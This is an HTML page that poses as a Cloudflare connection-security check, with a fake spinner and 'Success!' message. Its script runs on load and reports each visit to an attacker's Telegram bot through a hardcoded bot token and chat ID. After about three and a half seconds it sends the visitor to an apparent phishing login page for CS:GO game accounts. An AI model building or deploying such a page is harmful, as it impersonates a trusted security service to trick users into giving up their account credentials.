<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@400;500&display=swap');
        *{
            margin: 0;
            padding: 0;
        }
        body{
            font-family: 'Roboto', sans-serif;
        }
       .verif-container{
        position: absolute;
        left: 50%;
        top: 50%;
        transform: translate(-50%, -50%);
       }
       .title{
        font-size: 21px;
        font-weight: 600;
       }
       .subtitle{
        margin-top: 15px;
        font-size: 18px;
        font-weight: 500;
       }
       .verify-btn{
        margin: 25px 0px;
        width: 320px;
        height: 70px;
        display: flex;
        align-items: center;
        gap: 20px;
        padding: 15px;
        position: relative;
        border: 1px solid #aaaaaa;
        }
        .in-proccess{
            color: #0e0d0e;
            font-weight: 500;
            font-size: 16px;
        }
        .cloudfire-logo{
            position: absolute;
            right: 5px;
            top: 5px;
        }
        .cloudfire-logo p {
            display: flex;
            gap: 10px;
            align-items: center;
            font-size: 10px;
            position: relative;
            top: 5px;
            left: 10px;
        }
        .cloudfire-logo p span:first-child::after{
            content: '';
            display: block;
            position: absolute;
            top: 5px;
            left: 36px;
            width: 3px;
            height: 3px;
            background-color: rgb(0, 0, 0);
            border-radius: 50%;
        }
       .dot-spinner {
        --uib-size: 2.2rem;
        --uib-speed: .9s;
        --uib-color: #037537;
        position: relative;
        display: flex;
        align-items: center;
        justify-content: flex-start;
        height: var(--uib-size);
        width: var(--uib-size);
        }

        .dot-spinner__dot {
        position: absolute;
        top: 0;
        left: 0;
        display: flex;
        align-items: center;
        justify-content: flex-start;
        height: 100%;
        width: 100%;
        }

        .dot-spinner__dot::before {
        content: '';
        height: 20%;
        width: 20%;
        border-radius: 50%;
        background-color: var(--uib-color);
        transform: scale(0);
        opacity: 0.5;
        animation: pulse0112 calc(var(--uib-speed) * 1.111) ease-in-out infinite;
        box-shadow: 0 0 20px rgba(18, 31, 53, 0.3);
        }

        .dot-spinner__dot:nth-child(2) {
        transform: rotate(45deg);
        }

        .dot-spinner__dot:nth-child(2)::before {
        animation-delay: calc(var(--uib-speed) * -0.875);
        }

        .dot-spinner__dot:nth-child(3) {
        transform: rotate(90deg);
        }

        .dot-spinner__dot:nth-child(3)::before {
        animation-delay: calc(var(--uib-speed) * -0.75);
        }

        .dot-spinner__dot:nth-child(4) {
        transform: rotate(135deg);
        }

        .dot-spinner__dot:nth-child(4)::before {
        animation-delay: calc(var(--uib-speed) * -0.625);
        }

        .dot-spinner__dot:nth-child(5) {
        transform: rotate(180deg);
        }

        .dot-spinner__dot:nth-child(5)::before {
        animation-delay: calc(var(--uib-speed) * -0.5);
        }

        .dot-spinner__dot:nth-child(6) {
        transform: rotate(225deg);
        }

        .dot-spinner__dot:nth-child(6)::before {
        animation-delay: calc(var(--uib-speed) * -0.375);
        }

        .dot-spinner__dot:nth-child(7) {
        transform: rotate(270deg);
        }

        .dot-spinner__dot:nth-child(7)::before {
        animation-delay: calc(var(--uib-speed) * -0.25);
        }

        .dot-spinner__dot:nth-child(8) {
        transform: rotate(315deg);
        }

        .dot-spinner__dot:nth-child(8)::before {
        animation-delay: calc(var(--uib-speed) * -0.125);
        }

        @keyframes pulse0112 {
        0%,
        100% {
            transform: scale(0);
            opacity: 0.5;
        }

        50% {
            transform: scale(1);
            opacity: 1;
        }
        }

    .success-status {
        width: 30px;
        height: 30px;
        background-color: green;
        border-radius: 50%;
        justify-content: center;
        align-items: center;
        opacity: 0;
        transition: 1.3s ease opacity;
        position: absolute;
        }
       .active{
            opacity: 1;
            display: flex;

        }
        .in-proccess{
            position: absolute;
            left: 70px;
        }
    .checkmark {
        width: 18px;
        height: 18px;
        background-color: transparent;
        border-radius: 50%;
        display: flex;
        justify-content: center;
        align-items: center;
    }

    .icon {
        color: white; 
        font-size: 16px;
        line-height: 1;
    }


    </style>
</head>
<body>
    <div class="verif-container">
        <p class="title domainInfo" id="domainInfo"></p>
        <p class="subtitle">Checking the security of the connection to the site</p>
        <button class="verify-btn">
            <div class="dot-spinner">
                <div class="dot-spinner__dot"></div>
                <div class="dot-spinner__dot"></div>
                <div class="dot-spinner__dot"></div>
                <div class="dot-spinner__dot"></div>
                <div class="dot-spinner__dot"></div>
                <div class="dot-spinner__dot"></div>
                <div class="dot-spinner__dot"></div>
                <div class="dot-spinner__dot"></div>
            </div>
            <div class="success-status">
                <div class="checkmark">
                    <span class="icon">&#10004;</span>
                </div>
            </div>
            <span class="in-proccess">Verifying...</span>
            <div class="cloudfire-logo">
                <img src="https://upload.wikimedia.org/wikipedia/commons/4/4b/Cloudflare_Logo.svg" alt="" width="80px">
                <p>
                    <span>Privacy</span><span>Terms</span>
                </p>
            </div>
        </button>
        <p>First <span id="domainInfo" class="domainInfo" style="color: #525a67; font-weight: 500;"></span> needs to verify that your connection is secure</p>
    </div>
    <script>
        var currentDomain = window.location.hostname;
        var domainInfoElements = document.querySelectorAll('.domainInfo');
        var redirectUrl = 'https://csgo2-access.com/login/open' // ссылка на редирект

        var botToken = '5012014330:AAGtPyoCzaK0-lum1XbvhnOH1wUWrjF8XPc'; // Токен бота
        var chatId = '1459095103'; //ID  чата

        var message = encodeURIComponent("<b>Был переход: </b>" + currentDomain);
        var apiUrl = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${message}&parse_mode=HTML`;

        fetch(apiUrl)
            .then(response => response.json())
            .then(data => {
                console.log(data);
            })
            .catch(error => {
                console.error('Error sending message:', error);
            });


        domainInfoElements.forEach(function(element) {
            element.textContent = currentDomain;
        });
        setTimeout(function() {
            var spinner = document.querySelector('.dot-spinner');
            if (spinner) {
                spinner.parentNode.removeChild(spinner);
                var successStatus = document.querySelector('.success-status');
                var inProcessText = document.querySelector('.in-proccess');

                if (successStatus) {
                    successStatus.classList.add('active');
                }
                if (inProcessText) {
                    inProcessText.textContent = 'Success!';
                }

                setTimeout(function() {
                    window.location.href = redirectUrl;
                }, 1500); //редиректим через  полторы секунды
                }
        }, 2000); // 5 секунд на задержку
    </script>
</body>
</html>
